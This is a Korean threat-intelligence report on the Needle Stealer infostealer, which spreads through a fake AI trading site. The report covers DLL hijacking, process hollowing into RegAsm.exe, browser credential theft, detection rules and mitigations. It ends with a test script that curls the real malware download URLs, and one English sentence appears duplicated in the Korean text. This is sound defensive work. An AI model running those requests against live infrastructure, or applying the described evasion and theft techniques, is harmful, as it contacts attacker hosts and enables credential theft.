팔로우 
요약
AI 기반 거래 보조를 광고하는 사기성 웹사이트가 Needle Stealer 정보 탈취기를 전파하는 데 사용되고 있습니다. 감염 체인은 DLL 하이재킹과 프로세스 홀로잉을 통해 악성 코드를 주입하는 방식에 의존하고 있으며, RegAsm.exe, 합법적인 시스템 활동으로 위장하는 데 도움을 줍니다. 활성화되면, 이 정보 탈취기는 브라우저 데이터를 수집하고, 암호화폐 지갑 정보를 타겟하며, 악성 브라우저 확장 기능을 배포하여 손상을 확장할 수 있습니다. 공격자 제어 인프라로의 통신은 여러 HTTP API 엔드포인트를 통해 처리됩니다.
조사
연구자들은 tradingclaw.pro에서 다운로드된 ZIP 아카이브로 감염 흐름을 추적했습니다. 여기에는 iviewers.dll라는 이름의 DLL 로더가 포함되어 있었습니다. 그 로더는 RegAsm.exe의 프로세스를 탈취한 후 Golang 기반 Needle Stealer를 실행하는 2차 DLL을 투하했습니다. 추가 분석 결과, 이 정보 탈취기는 악성 브라우저 확장과 명령 및 제어 서버 구성을 정의하는 설정 파일이 포함된 숨겨진 ZIP 아카이브를 추출한 것으로 나타났습니다. RegAsm.exe and launched the Golang-based Needle Stealer. Further analysis showed that the stealer extracted concealed ZIP archives containing malicious browser extensions along with a configuration file that defined its command-and-control servers.
완화 방안
사용자는 신뢰할 수 없는 웹사이트에서 소프트웨어를 다운로드하는 것을 피하고, 설치 프로그램을 실행하기 전에 게시자 서명을 항상 확인해야 합니다. 보안 팀은 설치된 브라우저 확장 기능을 주기적으로 감사하고, 승인되지 않거나 의심스러운 항목을 제거해야 합니다. 네트워크 모니터링은 캠페인과 연결된 알려진 악성 도메인 및 IP 주소에 대한 트래픽을 탐지하도록 구성되어야 합니다. 또한, 엔드포인트 보호 도구는 DLL 하이재킹 동작과 프로세스 홀로잉 기술을 식별하도록 조정되어야 합니다.
대응
보안 수호자들은 iviewers.dll 의 실행과 주입의 징후에 대한 엔드포인트 원격 측정을 검토해야 합니다. RegAsm.exe감지된 명령 및 제어 도메인과 IP 주소는 방화벽 또는 프록시 레벨에서 차단해야 합니다. 보안 팀은 보고된 해시 또는 파일 이름과 일치하는 파일을 격리하고, %LOCALAPPDATA%PackagesExtensions에서 의심스러운 확장을 제거하며, 영향을 받은 계정과 연결된 자격 증명을 재설정해야 합니다. 또한, 잠재적으로 영향을 받은 암호화폐 지갑은 승인되지 않은 활동이 있는지 검토해야 합니다.
“graph TB
%% Class definitions
classDef action fill:#99ccff
classDef malware fill:#ff9999
classDef process fill:#ccccff
%% Nodes
step_a[“Action – T1659 콘텐츠 주입
사용자가 악성 TradingClaw 사이트를 방문하여 악성 콘텐츠를 얻습니다.
설명: 공격자가 합법적인 웹사이트에 악성 콘텐츠를 주입하여 페이로드를 배달합니다.”]
class step_a action
step_b[“Action – T1204.001 악성 링크
사용자가 클릭하여 악성 ZIP 아카이브를 다운로드합니다.
설명: 사용자가 인증 정보 탈취나 다른 페이로드 다운로드에 이르는 악성 링크를 클릭하도록 유도됩니다.”]
class step_b action
step_c[“Action – 여러 기술
위장 T1036.001: iviewers.dll이 합법적인 파일로 모방합니다.
신뢰 통제 전복 T1553.002: DLL을 하이재킹하여 신뢰를 우회합니다.
시스템 바이너리 프록시 실행 T1218: 시스템 바이너리를 사용하여 실행합니다.
신뢰된 개발자 유틸리티 프록시 실행 T1127: 신뢰된 유틸리티를 악용합니다.
반사 코드 로딩 T1620: 디스크에 터치하지 않고 코드를 로드합니다.
설명: iviewers.dll을 통한 DLL 하이재킹으로 악성 코드를 실행합니다.”]
class step_c action
step_d[“프로세스 주입 – T1055.012 프로세스 홀로잉
RegAsm.exe 프로세스에 악성 코드가 주입됩니다.
설명: 공격자가 비어 있는 프로세스를 생성하고 악성 페이로드를 삽입합니다.”]
class step_d process
step_e[“악성코드 – Needle Stealer 핵심
실행 후 피해자 데이터를 수집합니다.”]
class step_e malware
step_f[“자격 증명 접근 – T1115 클립보드 데이터
클립보드 내용을 수집합니다.
설명: 비밀번호와 같은 클립보드에 복사된 데이터를 캡처합니다.”]
class step_f action
step_g[“입력 캡처 – T1056 입력 캡처
입력된 폼 데이터를 캡처합니다.
설명: 키 입력이나 폼 필드를 기록하여 자격 증명을 탈취합니다.”]
class step_g action
step_h[“자격 증명 접근 – 여러 기술
브라우저 정보 발견 T1217: 설치된 브라우저를 열거합니다.
웹 브라우저에서의 자격 증명 T1555.003: 저장된 비밀번호를 추출합니다.
웹 세션 쿠키 T1550.004: 세션 쿠키를 읽습니다.
웹 세션 쿠키 탈취 T1539: 쿠키를 빼돌립니다.
웹 자격 증명 위조 T1606: 위조된 자격 증명을 생성합니다.
설명: 브라우저 데이터, 자격 증명 및 쿠키를 탈취합니다.”]
class step_h action
step_i[“지속성 – T1176 소프트웨어 확장
악성 브라우저 확장을 설치합니다.
설명: 확장이 브라우저에 지속되어 트래픽을 변경할 수 있습니다.”]
class step_i action
step_j[“Action – 확장이 트래픽을 조작합니다
요청을 리다이렉트하고, 다운로드를 교체하며, 스크립트를 주입합니다.”]
class step_j action
step_k[“명령 및 제어 – 여러 기술
데이터 인코딩 T1132.001: 탈출 전에 데이터를 인코딩합니다.
C2 채널을 통한 탈출 T1041: C2를 통해 데이터를 보냅니다.
설명: 탈취된 데이터를 원격 서버에 통신합니다.”]
class step_k action
%% Connections
step_a –>|leads_to| step_b
step_b –>|leads_to| step_c
step_c –>|leads_to| step_d
step_d –>|leads_to| step_e
step_e –>|collects| step_f
step_e –>|collects| step_g
step_e –>|collects| step_h
step_e –>|installs| step_i
step_i –>|enables| step_j
step_j –>|communicates| step_k
“
공격 흐름
탐지
Oleview를 사용한 DLL 사이드 로딩 시도 가능성 (image_load를 통해)
보기
비정상적인 최상위 도메인(TLD) DNS 요청을 통한 의심스러운 명령 및 제어 (dns를 통해)
보기
감지: 악성 거래 웹사이트가 악성 코드를 드롭하여 브라우저를 공격자에게 넘겨주는 IOCs (HashSha256)
보기
감지: 악성 거래 웹사이트가 악성 코드를 드롭하여 브라우저를 공격자에게 넘겨주는 IOCs (SourceIP)
보기
감지: 악성 거래 웹사이트가 악성 코드를 드롭하여 브라우저를 공격자에게 넘겨주는 IOCs (DestinationIP)
보기
악성 TradingClaw 및 리다이렉트 사이트의 탐지 [웹서버]
보기
시뮬레이션 실행
사전조건: 원격 측정 및 기본선 사전 비행 점검이 통과해야 합니다.
근거: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적의 기술 기법(TTP)의 정확한 실행을 상세히 설명합니다. 명령어와 내러티브는 식별된 TTP를 직접 반영해야 하며, 탐지 논리에 의해 예상되는 정확한 원격 측정을 생성하는 것을 목표로 해야 합니다.
-
공격 내러티브 및 명령:
Needle Stealer 악성코드를 획득한 공격자는 이를 악성 도메인tradingclaw.pro에 호스팅합니다. 공격자는 피해자가 악성 링크(예: 피싱 이메일)를 열도록 설득합니다. 피해자의 브라우저는http://tradingclaw.pro/stealer.exe에 HTTP GET 요청을 하며, 프록시는 이를 로그에 기록합니다. URL에 정확한 문자열tradingclaw.pro이 포함되어 있기 때문에, Sigma 규칙의 조건 (url|contains)가 true로 평가되어 알람을 생성합니다.테스트 환경에서 이를 복제하기 위해, 다음과 같은 직접적인
curl요청을 악성 도메인으로 보냅니다. 요청은 일반적인 사용자 트래픽(표준 사용자 에이전트, 특별한 헤더 없음)처럼 보이도록 구성되어 도메인 일치만이 알람을 유발합니다. -
회귀 테스트 스크립트:
#!/usr/bin/env bash # ------------------------------------------------------------ # "Malicious TradingClaw" 탐지 규칙을 트리거하기 위해 악의적인 접근을 시뮬레이션합니다. # ------------------------------------------------------------ set -euo pipefail # 악성 URL 정의 (규칙에서 사용된 정확한 문자열) MALICIOUS_URLS=( "http://tradingclaw.pro/stealer.exe" "https://studypages.com/download/needle.exe" ) for url in "${MALICIOUS_URLS[@]}"; do echo "[*] 요청 중 ${url}" # 브라우저를 모방하기 위해 현실적인 사용자 에이전트를 사용합니다. curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36" -s -o /dev/null "${url}" done echo "[+] 시뮬레이션 완료." -
정리 명령:
# curl 요청에 의해 생성된 지속적인 아티팩트는 없습니다. # 나중에 테스트에서 도메인의 우발적 재사용을 방지하기 위해 DNS 캐시를 플러시합니다. if command -v ipconfig >/dev/null 2>&1; then ipconfig /flushdns elif command -v systemd-resolve >/dev/null 2>&1; then systemd-resolve --flush-caches fi echo "[+] 정리 완료."
보고서 종료